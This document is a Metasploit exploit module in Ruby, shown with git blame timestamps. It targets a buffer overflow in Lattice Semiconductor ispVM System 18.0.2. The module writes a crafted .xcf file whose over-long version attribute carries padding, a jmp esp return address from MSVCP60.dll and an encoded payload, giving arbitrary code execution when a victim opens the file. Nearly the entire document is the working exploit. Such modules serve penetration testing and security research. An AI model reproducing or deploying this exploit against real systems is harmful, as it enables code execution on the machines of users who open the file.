Files
metasploit-gs/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb
T

80 lines
2.2 KiB
Ruby
Raw Normal View History

2012-05-28 08:51:36 +02:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2012-05-28 08:51:36 +02:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = NormalRanking
2012-05-28 08:51:36 +02:00
2013-08-30 16:28:54 -05:00
include Msf::Exploit::FILEFORMAT
2012-05-28 08:51:36 +02:00
2013-08-30 16:28:54 -05:00
def initialize(info={})
super(update_info(info,
'Name' => "Lattice Semiconductor ispVM System XCF File Handling Overflow",
'Description' => %q{
This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way
ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially
crafted file, when a long value is supplied for the version attribute of the ispXCF
tag. It results in arbitrary code execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability Discovery
'juan vazquez' # Metasploit
],
'References' =>
[
['OSVDB', '82000'],
2013-08-30 16:28:54 -05:00
['BID', '53562'],
['URL', 'http://secunia.com/advisories/48740/']
],
'Payload' =>
{
'Space' => 4000,
'BadChars' => "\x00\x1a\x3c\x20\x3e\xff"
},
'DefaultOptions' =>
{
2015-09-01 10:46:54 +02:00
'EXITFUNC' => 'thread',
2013-08-30 16:28:54 -05:00
},
'Platform' => 'win',
'Targets' =>
[
[ 'ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 274,
'BreakOffset' => 243,
'Ret' => 0x780e9d6e # jmp esp from C:\ispTOOLS\ispvmsystem\MSVCP60.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => "May 16 2012",
'DefaultTarget' => 0))
2012-05-28 08:51:36 +02:00
2013-08-30 16:28:54 -05:00
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xcf']),
])
2012-05-28 08:51:36 +02:00
2013-08-30 16:28:54 -05:00
end
2012-05-28 08:51:36 +02:00
2013-08-30 16:28:54 -05:00
def exploit
2012-05-28 08:51:36 +02:00
2013-08-30 16:28:54 -05:00
buf = rand_text(target['Offset'])
buf[target['BreakOffset']] = "A"
buf << [target.ret].pack("V")
buf << payload.encoded
2012-05-28 08:51:36 +02:00
2013-08-30 16:28:54 -05:00
xcf = %Q|
<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE ispXCF SYSTEM "IspXCF.dtd" >
<ispXCF version="#{buf}">
</ispXCF>
|
2012-05-28 08:51:36 +02:00
2013-08-30 16:28:54 -05:00
file_create(xcf)
end
2012-05-30 16:14:48 -05:00
end